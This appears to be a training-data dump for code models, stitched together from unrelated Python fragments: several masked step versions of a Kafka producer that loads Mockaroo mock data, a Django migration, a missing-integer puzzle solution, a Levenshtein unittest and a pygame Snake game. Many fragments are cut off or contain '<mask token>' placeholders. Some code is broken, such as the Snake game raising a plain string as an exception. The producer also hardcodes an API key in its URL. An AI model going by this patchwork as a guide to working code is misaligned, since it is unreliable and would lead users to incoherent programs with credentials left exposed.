"step-1": "<mask token>\n\n\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\n\ndef main():\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n ccloud_lib.create_topic(conf, topic)\n print('hello world')\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value,\n on_delivery=acked)\n producer.poll(0)\n producer.flush()\n print('{} messages were produced to topic {}!'.format(delivered_records,\n topic))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef acked(err, msg):\n global delivered_records\n \"\"\"Delivery report handler called on\n successful or failed delivery of message\n \"\"\"\n if err is not None:\n print('Failed to deliver message: {}'.format(err))\n else:\n delivered_records += 1\n print('Produced record to topic {} partition [{}] @ offset {}'.\n format(msg.topic(), msg.partition(), msg.offset()))\n\n\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\n\ndef main():\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n ccloud_lib.create_topic(conf, topic)\n print('hello world')\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value,\n on_delivery=acked)\n producer.poll(0)\n producer.flush()\n print('{} messages were produced to topic {}!'.format(delivered_records,\n topic))\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\ndelivered_records = 0\nurl = 'https://api.mockaroo.com/api/cbb61270?count=1000&key=5a40bdb0'\n\n\ndef acked(err, msg):\n global delivered_records\n \"\"\"Delivery report handler called on\n successful or failed delivery of message\n \"\"\"\n if err is not None:\n print('Failed to deliver message: {}'.format(err))\n else:\n delivered_records += 1\n print('Produced record to topic {} partition [{}] @ offset {}'.\n format(msg.topic(), msg.partition(), msg.offset()))\n\n\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\n\ndef main():\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n ccloud_lib.create_topic(conf, topic)\n print('hello world')\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value,\n on_delivery=acked)\n producer.poll(0)\n producer.flush()\n print('{} messages were produced to topic {}!'.format(delivered_records,\n topic))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import requests\nfrom confluent_kafka import Producer, KafkaError\nimport json\nimport ccloud_lib\ndelivered_records = 0\nurl = 'https://api.mockaroo.com/api/cbb61270?count=1000&key=5a40bdb0'\n\n\ndef acked(err, msg):\n global delivered_records\n \"\"\"Delivery report handler called on\n successful or failed delivery of message\n \"\"\"\n if err is not None:\n print('Failed to deliver message: {}'.format(err))\n else:\n delivered_records += 1\n print('Produced record to topic {} partition [{}] @ offset {}'.\n format(msg.topic(), msg.partition(), msg.offset()))\n\n\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\n\ndef main():\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n ccloud_lib.create_topic(conf, topic)\n print('hello world')\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value,\n on_delivery=acked)\n producer.poll(0)\n producer.flush()\n print('{} messages were produced to topic {}!'.format(delivered_records,\n topic))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import requests\n#!/usr/bin/env python\n\nfrom confluent_kafka import Producer, KafkaError\nimport json\nimport ccloud_lib\n\ndelivered_records = 0\nurl = \"https://api.mockaroo.com/api/cbb61270?count=1000&key=5a40bdb0\"\n\n\n # Optional per-message on_delivery handler (triggered by poll() or flush())\n # when a message has been successfully delivered or\n # permanently failed delivery (after retries).\ndef acked(err, msg):\n global delivered_records\n \"\"\"Delivery report handler called on\n successful or failed delivery of message\n \"\"\"\n if err is not None:\n print(\"Failed to deliver message: {}\".format(err))\n else:\n delivered_records += 1\n print(\"Produced record to topic {} partition [{}] @ offset {}\"\n .format(msg.topic(), msg.partition(), msg.offset()))\n\n#get mockaroo data records\n#make sure mockaroo schema is set to output array\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\ndef main():\n # Read arguments and configurations and initialize\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n\n # Create Producer instance\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n\n # Create topic if needed\n ccloud_lib.create_topic(conf, topic)\n\n print(\"hello world\")\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value, on_delivery=acked)\n producer.poll(0)\n\n producer.flush()\n\n print(\"{} messages were produced to topic {}!\".format(delivered_records, topic))\n\n\nif __name__ == '__main__':\n main()\n\n\n# to run program\n# python user_purchases_to_kafka.py -f ~/.confluent/python.config -t user_purchases\n# python user_activity_to_kafka.py -f ~/.confluent/python.config -t user_activity\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
# Generated by Django 2.1.3 on 2019-04-10 11:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0014_auto_20190409_1917'),
]
operations = [
migrations.AlterField(
model_name='article',
name='estArchive',
field=models.BooleanField(default=False, verbose_name="Archiver l'article"),
),
migrations.AlterField(
model_name='projet',
name='estArchive',
field=models.BooleanField(default=False, verbose_name='Archiver le projet'),
),
]
|
normal
|
{
"blob_id": "21c8078a18ee4579fa9b4b1b667d6ea0c1ce99b3",
"index": 6005,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0014_auto_20190409_1917')]\n operations = [migrations.AlterField(model_name='article', name=\n 'estArchive', field=models.BooleanField(default=False, verbose_name\n =\"Archiver l'article\")), migrations.AlterField(model_name='projet',\n name='estArchive', field=models.BooleanField(default=False,\n verbose_name='Archiver le projet'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0014_auto_20190409_1917')]\n operations = [migrations.AlterField(model_name='article', name=\n 'estArchive', field=models.BooleanField(default=False, verbose_name\n =\"Archiver l'article\")), migrations.AlterField(model_name='projet',\n name='estArchive', field=models.BooleanField(default=False,\n verbose_name='Archiver le projet'))]\n",
"step-5": "# Generated by Django 2.1.3 on 2019-04-10 11:04\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0014_auto_20190409_1917'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='article',\n name='estArchive',\n field=models.BooleanField(default=False, verbose_name=\"Archiver l'article\"),\n ),\n migrations.AlterField(\n model_name='projet',\n name='estArchive',\n field=models.BooleanField(default=False, verbose_name='Archiver le projet'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def solution(A):
if not A:
return 1
elif len(A) == 1:
if A[0] == 1:
return 2
else:
return 1
A.sort()
prev = 0
for i in A:
if i != (prev + 1):
return i - 1
else:
prev = i
return prev + 1
|
normal
|
{
"blob_id": "8c3c066ed37fe0f67acfd2d5dc9d57ec2b996275",
"index": 5640,
"step-1": "<mask token>\n",
"step-2": "def solution(A):\n if not A:\n return 1\n elif len(A) == 1:\n if A[0] == 1:\n return 2\n else:\n return 1\n A.sort()\n prev = 0\n for i in A:\n if i != prev + 1:\n return i - 1\n else:\n prev = i\n return prev + 1\n",
"step-3": "def solution(A):\n if not A:\n return 1\n elif len(A) == 1:\n if A[0] == 1:\n return 2\n else:\n return 1\n\n A.sort()\n prev = 0\n for i in A:\n if i != (prev + 1):\n return i - 1\n else:\n prev = i\n\n return prev + 1\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
def _mk_test_fn(fn, a, b, expected):
def _test_fn(self):
self.assertEqual(fn(a, b), expected)
self.assertEqual(fn(b, a), expected)
return _test_fn
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
def _mk_test_fn(fn, a, b, expected):
def _test_fn(self):
self.assertEqual(fn(a, b), expected)
self.assertEqual(fn(b, a), expected)
return _test_fn
for lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):
name, a, b, expected = data
test_fn = _mk_test_fn(lev_fn, a, b, expected)
setattr(Tests, 'test_{}_{}'.format(name, lev_fn.__name__), test_fn)
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
TEST_DATA = [('classic', 'kitten', 'sitting', 3), ('same', 'kitten',
'kitten', 0), ('empty', '', '', 0), ('a', 'meilenstein', 'levenshtein',
4), ('b', 'levenshtein', 'frankenstein', 6), ('c', 'confide', 'deceit',
6), ('d', 'CUNsperrICY', 'conspiracy', 8)]
TEST_FUNCTIONS = [Levenshtein().recursive, Levenshtein().wf, Levenshtein().
wfi, Levenshtein().damerau]
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
def _mk_test_fn(fn, a, b, expected):
def _test_fn(self):
self.assertEqual(fn(a, b), expected)
self.assertEqual(fn(b, a), expected)
return _test_fn
for lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):
name, a, b, expected = data
test_fn = _mk_test_fn(lev_fn, a, b, expected)
setattr(Tests, 'test_{}_{}'.format(name, lev_fn.__name__), test_fn)
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import itertools
import unittest
from pylev3 import Levenshtein
TEST_DATA = [
('classic', "kitten", "sitting", 3),
('same', "kitten", "kitten", 0),
('empty', "", "", 0),
('a', "meilenstein", "levenshtein", 4),
('b', "levenshtein", "frankenstein", 6),
('c', "confide", "deceit", 6),
('d', "CUNsperrICY", "conspiracy", 8),
]
TEST_FUNCTIONS = [
# Levenshtein().classic, # too slow
Levenshtein().recursive,
Levenshtein().wf,
Levenshtein().wfi,
Levenshtein().damerau
]
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
def _mk_test_fn(fn, a, b, expected):
def _test_fn(self):
self.assertEqual(fn(a, b), expected)
self.assertEqual(fn(b, a), expected)
return _test_fn
for lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):
name, a, b, expected = data
test_fn = _mk_test_fn(lev_fn, a, b, expected)
setattr(Tests, "test_{}_{}".format(name, lev_fn.__name__), test_fn)
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "892d6662e4276f96797c9654d15c96a608d0835a",
"index": 8927,
"step-1": "<mask token>\n\n\nclass Tests(unittest.TestCase):\n\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Tests(unittest.TestCase):\n\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\ndef _mk_test_fn(fn, a, b, expected):\n\n def _test_fn(self):\n self.assertEqual(fn(a, b), expected)\n self.assertEqual(fn(b, a), expected)\n return _test_fn\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Tests(unittest.TestCase):\n\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\ndef _mk_test_fn(fn, a, b, expected):\n\n def _test_fn(self):\n self.assertEqual(fn(a, b), expected)\n self.assertEqual(fn(b, a), expected)\n return _test_fn\n\n\nfor lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):\n name, a, b, expected = data\n test_fn = _mk_test_fn(lev_fn, a, b, expected)\n setattr(Tests, 'test_{}_{}'.format(name, lev_fn.__name__), test_fn)\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nTEST_DATA = [('classic', 'kitten', 'sitting', 3), ('same', 'kitten',\n 'kitten', 0), ('empty', '', '', 0), ('a', 'meilenstein', 'levenshtein',\n 4), ('b', 'levenshtein', 'frankenstein', 6), ('c', 'confide', 'deceit',\n 6), ('d', 'CUNsperrICY', 'conspiracy', 8)]\nTEST_FUNCTIONS = [Levenshtein().recursive, Levenshtein().wf, Levenshtein().\n wfi, Levenshtein().damerau]\n\n\nclass Tests(unittest.TestCase):\n\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\ndef _mk_test_fn(fn, a, b, expected):\n\n def _test_fn(self):\n self.assertEqual(fn(a, b), expected)\n self.assertEqual(fn(b, a), expected)\n return _test_fn\n\n\nfor lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):\n name, a, b, expected = data\n test_fn = _mk_test_fn(lev_fn, a, b, expected)\n setattr(Tests, 'test_{}_{}'.format(name, lev_fn.__name__), test_fn)\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import itertools\nimport unittest\n\nfrom pylev3 import Levenshtein\n\n\nTEST_DATA = [\n ('classic', \"kitten\", \"sitting\", 3),\n ('same', \"kitten\", \"kitten\", 0),\n ('empty', \"\", \"\", 0),\n ('a', \"meilenstein\", \"levenshtein\", 4),\n ('b', \"levenshtein\", \"frankenstein\", 6),\n ('c', \"confide\", \"deceit\", 6),\n ('d', \"CUNsperrICY\", \"conspiracy\", 8),\n]\n\nTEST_FUNCTIONS = [\n # Levenshtein().classic, # too slow\n Levenshtein().recursive,\n Levenshtein().wf,\n Levenshtein().wfi,\n Levenshtein().damerau\n]\n\n\nclass Tests(unittest.TestCase):\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\ndef _mk_test_fn(fn, a, b, expected):\n def _test_fn(self):\n self.assertEqual(fn(a, b), expected)\n self.assertEqual(fn(b, a), expected)\n return _test_fn\n\n\nfor lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):\n name, a, b, expected = data\n test_fn = _mk_test_fn(lev_fn, a, b, expected)\n setattr(Tests, \"test_{}_{}\".format(name, lev_fn.__name__), test_fn)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
<|reserved_special_token_0|>
class Food:
<|reserved_special_token_0|>
def draw(self):
seq = [self.food1, self.food2]
self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))
pygame.display.flip()
def move(self):
self.food_x = random.randint(0, W // SIZE - 1) * SIZE
self.food_y = random.randint(0, H // SIZE - 1) * SIZE
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption('Snake Game')
self.surface = pygame.display.set_mode(SCREEN)
self.surface.fill(BACKGROUND)
self.snake = Snake(self.surface, 3)
self.snake.draw()
self.food = Food(self.surface)
self.food.draw()
pygame.mixer.init()
self.background_music()
def is_collision(self, x1, y1, x2, y2):
if x1 >= x2 and x1 < x2 + SIZE:
if y1 >= y2 and y1 < y2 + SIZE:
return True
else:
return False
def play_sound(self, sound_location):
sound = pygame.mixer.Sound(sound_location)
pygame.mixer.Sound.play(sound)
def background_music(self):
pygame.mixer.music.load('resources/b_music1.mp3')
pygame.mixer.music.play(-1)
def render_background(self):
bg = pygame.image.load('resources/background.jpg')
self.surface.blit(bg, (0, 0))
def play(self):
self.render_background()
self.snake.move()
self.food.draw()
self.display_score()
self.screen_msgs()
pygame.display.flip()
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
self.food.food_x, self.food.food_y):
self.food.move()
self.snake.increase_length()
self.play_sound('resources/ding.mp3')
for i in range(2, self.snake.length):
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[
0], self.snake.snake_x[i], self.snake.snake_y[i]):
self.play_sound('resources/fail_buzz.mp3')
raise 'Game Over'
self.touch_border_action()
def pause_msg(self):
font = pygame.font.SysFont('arial', 20)
font1 = pygame.font.SysFont('Rockwell', 80)
line1 = font1.render(f'<Paused>', True, (200, 200, 200))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume',
True, (255, 255, 0))
self.surface.blit(line1, (W // 4 + 20, H // 3))
self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))
pygame.display.flip()
def show_game_over(self):
self.render_background()
font = pygame.font.SysFont('Cooper Black', 30)
font1 = pygame.font.SysFont('Cooper Black', 60)
line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))
line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,
(10, 255, 10))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',
True, (200, 200, 200))
line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))
self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))
self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))
self.surface.blit(line2, (45, H // 3 + 110))
self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))
pygame.display.flip()
pygame.mixer.music.rewind()
pygame.mixer.music.pause()
def touch_border_action(self):
if self.snake.snake_x[0] == W:
self.snake.snake_x[0] = 0
elif self.snake.snake_x[0] < 0:
self.snake.snake_x[0] = W
if self.snake.snake_y[0] == H:
self.snake.snake_y[0] = 0
elif self.snake.snake_y[0] < 0:
self.snake.snake_y[0] = H
def reset_game(self):
self.snake = Snake(self.surface, 3)
self.food = Food(self.surface)
def display_score(self):
font = pygame.font.SysFont('Algerian', 30)
score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,
255, 255))
self.surface.blit(score, (W // 2 - 70, 5))
def screen_msgs(self):
font = pygame.font.SysFont('aharoni', 16)
msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))
msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))
self.surface.blit(msgs1, (W - 100, H - 20))
self.surface.blit(msgs2, (10, H - 20))
def run(self):
clock = pygame.time.Clock()
running = True
pause_game = False
while running:
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
running = False
if event.key == K_SPACE:
pygame.mixer.music.pause()
self.pause_msg()
pause_game = True
if event.key == K_UP:
self.snake.move_up()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_DOWN:
self.snake.move_down()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_LEFT:
self.snake.move_left()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_RIGHT:
self.snake.move_right()
pause_game = False
pygame.mixer.music.unpause()
elif event.type == QUIT:
running = False
if not pause_game:
try:
self.play()
except Exception as e:
self.show_game_over()
pause_game = True
self.reset_game()
clock.tick(60)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Snake:
def __init__(self, parent_screen, length):
self.parent_screen = parent_screen
self.length = length
self.snake = pygame.image.load('resources/snake.png').convert()
self.snake_x = [W // 2] * length
self.snake_y = [H // 2] * length
self.direction = 'left'
<|reserved_special_token_0|>
def draw(self):
for i in range(self.length):
self.parent_screen.blit(self.snake, (self.snake_x[i], self.
snake_y[i]))
pygame.display.flip()
def move(self):
for i in range(self.length - 1, 0, -1):
self.snake_x[i] = self.snake_x[i - 1]
self.snake_y[i] = self.snake_y[i - 1]
if self.direction == 'up':
self.snake_y[0] -= SIZE
if self.direction == 'down':
self.snake_y[0] += SIZE
if self.direction == 'right':
self.snake_x[0] += SIZE
if self.direction == 'left':
self.snake_x[0] -= SIZE
self.draw()
def move_up(self):
self.direction = 'up'
def move_down(self):
self.direction = 'down'
def move_right(self):
self.direction = 'right'
def move_left(self):
self.direction = 'left'
class Food:
def __init__(self, parent_screen):
self.parent_screen = parent_screen
self.food1 = pygame.image.load('resources/food.png').convert()
self.food2 = pygame.image.load('resources/snake1.png').convert()
self.food_x = SIZE * 3
self.food_y = SIZE * 2
def draw(self):
seq = [self.food1, self.food2]
self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))
pygame.display.flip()
def move(self):
self.food_x = random.randint(0, W // SIZE - 1) * SIZE
self.food_y = random.randint(0, H // SIZE - 1) * SIZE
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption('Snake Game')
self.surface = pygame.display.set_mode(SCREEN)
self.surface.fill(BACKGROUND)
self.snake = Snake(self.surface, 3)
self.snake.draw()
self.food = Food(self.surface)
self.food.draw()
pygame.mixer.init()
self.background_music()
def is_collision(self, x1, y1, x2, y2):
if x1 >= x2 and x1 < x2 + SIZE:
if y1 >= y2 and y1 < y2 + SIZE:
return True
else:
return False
def play_sound(self, sound_location):
sound = pygame.mixer.Sound(sound_location)
pygame.mixer.Sound.play(sound)
def background_music(self):
pygame.mixer.music.load('resources/b_music1.mp3')
pygame.mixer.music.play(-1)
def render_background(self):
bg = pygame.image.load('resources/background.jpg')
self.surface.blit(bg, (0, 0))
def play(self):
self.render_background()
self.snake.move()
self.food.draw()
self.display_score()
self.screen_msgs()
pygame.display.flip()
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
self.food.food_x, self.food.food_y):
self.food.move()
self.snake.increase_length()
self.play_sound('resources/ding.mp3')
for i in range(2, self.snake.length):
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[
0], self.snake.snake_x[i], self.snake.snake_y[i]):
self.play_sound('resources/fail_buzz.mp3')
raise 'Game Over'
self.touch_border_action()
def pause_msg(self):
font = pygame.font.SysFont('arial', 20)
font1 = pygame.font.SysFont('Rockwell', 80)
line1 = font1.render(f'<Paused>', True, (200, 200, 200))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume',
True, (255, 255, 0))
self.surface.blit(line1, (W // 4 + 20, H // 3))
self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))
pygame.display.flip()
def show_game_over(self):
self.render_background()
font = pygame.font.SysFont('Cooper Black', 30)
font1 = pygame.font.SysFont('Cooper Black', 60)
line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))
line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,
(10, 255, 10))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',
True, (200, 200, 200))
line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))
self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))
self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))
self.surface.blit(line2, (45, H // 3 + 110))
self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))
pygame.display.flip()
pygame.mixer.music.rewind()
pygame.mixer.music.pause()
def touch_border_action(self):
if self.snake.snake_x[0] == W:
self.snake.snake_x[0] = 0
elif self.snake.snake_x[0] < 0:
self.snake.snake_x[0] = W
if self.snake.snake_y[0] == H:
self.snake.snake_y[0] = 0
elif self.snake.snake_y[0] < 0:
self.snake.snake_y[0] = H
def reset_game(self):
self.snake = Snake(self.surface, 3)
self.food = Food(self.surface)
def display_score(self):
font = pygame.font.SysFont('Algerian', 30)
score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,
255, 255))
self.surface.blit(score, (W // 2 - 70, 5))
def screen_msgs(self):
font = pygame.font.SysFont('aharoni', 16)
msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))
msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))
self.surface.blit(msgs1, (W - 100, H - 20))
self.surface.blit(msgs2, (10, H - 20))
def run(self):
clock = pygame.time.Clock()
running = True
pause_game = False
while running:
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
running = False
if event.key == K_SPACE:
pygame.mixer.music.pause()
self.pause_msg()
pause_game = True
if event.key == K_UP:
self.snake.move_up()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_DOWN:
self.snake.move_down()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_LEFT:
self.snake.move_left()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_RIGHT:
self.snake.move_right()
pause_game = False
pygame.mixer.music.unpause()
elif event.type == QUIT:
running = False
if not pause_game:
try:
self.play()
except Exception as e:
self.show_game_over()
pause_game = True
self.reset_game()
clock.tick(60)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
SIZE = 20
BACKGROUND = 45, 34, 44
W = 800
H = 400
SCREEN = W, H
class Snake:
def __init__(self, parent_screen, length):
self.parent_screen = parent_screen
self.length = length
self.snake = pygame.image.load('resources/snake.png').convert()
self.snake_x = [W // 2] * length
self.snake_y = [H // 2] * length
self.direction = 'left'
def increase_length(self):
self.length += 1
self.snake_x.append(0)
self.snake_y.append(0)
def draw(self):
for i in range(self.length):
self.parent_screen.blit(self.snake, (self.snake_x[i], self.
snake_y[i]))
pygame.display.flip()
def move(self):
for i in range(self.length - 1, 0, -1):
self.snake_x[i] = self.snake_x[i - 1]
self.snake_y[i] = self.snake_y[i - 1]
if self.direction == 'up':
self.snake_y[0] -= SIZE
if self.direction == 'down':
self.snake_y[0] += SIZE
if self.direction == 'right':
self.snake_x[0] += SIZE
if self.direction == 'left':
self.snake_x[0] -= SIZE
self.draw()
def move_up(self):
self.direction = 'up'
def move_down(self):
self.direction = 'down'
def move_right(self):
self.direction = 'right'
def move_left(self):
self.direction = 'left'
class Food:
def __init__(self, parent_screen):
self.parent_screen = parent_screen
self.food1 = pygame.image.load('resources/food.png').convert()
self.food2 = pygame.image.load('resources/snake1.png').convert()
self.food_x = SIZE * 3
self.food_y = SIZE * 2
def draw(self):
seq = [self.food1, self.food2]
self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))
pygame.display.flip()
def move(self):
self.food_x = random.randint(0, W // SIZE - 1) * SIZE
self.food_y = random.randint(0, H // SIZE - 1) * SIZE
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption('Snake Game')
self.surface = pygame.display.set_mode(SCREEN)
self.surface.fill(BACKGROUND)
self.snake = Snake(self.surface, 3)
self.snake.draw()
self.food = Food(self.surface)
self.food.draw()
pygame.mixer.init()
self.background_music()
def is_collision(self, x1, y1, x2, y2):
if x1 >= x2 and x1 < x2 + SIZE:
if y1 >= y2 and y1 < y2 + SIZE:
return True
else:
return False
def play_sound(self, sound_location):
sound = pygame.mixer.Sound(sound_location)
pygame.mixer.Sound.play(sound)
def background_music(self):
pygame.mixer.music.load('resources/b_music1.mp3')
pygame.mixer.music.play(-1)
def render_background(self):
bg = pygame.image.load('resources/background.jpg')
self.surface.blit(bg, (0, 0))
def play(self):
self.render_background()
self.snake.move()
self.food.draw()
self.display_score()
self.screen_msgs()
pygame.display.flip()
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
self.food.food_x, self.food.food_y):
self.food.move()
self.snake.increase_length()
self.play_sound('resources/ding.mp3')
for i in range(2, self.snake.length):
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[
0], self.snake.snake_x[i], self.snake.snake_y[i]):
self.play_sound('resources/fail_buzz.mp3')
raise 'Game Over'
self.touch_border_action()
def pause_msg(self):
font = pygame.font.SysFont('arial', 20)
font1 = pygame.font.SysFont('Rockwell', 80)
line1 = font1.render(f'<Paused>', True, (200, 200, 200))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume',
True, (255, 255, 0))
self.surface.blit(line1, (W // 4 + 20, H // 3))
self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))
pygame.display.flip()
def show_game_over(self):
self.render_background()
font = pygame.font.SysFont('Cooper Black', 30)
font1 = pygame.font.SysFont('Cooper Black', 60)
line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))
line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,
(10, 255, 10))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',
True, (200, 200, 200))
line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))
self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))
self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))
self.surface.blit(line2, (45, H // 3 + 110))
self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))
pygame.display.flip()
pygame.mixer.music.rewind()
pygame.mixer.music.pause()
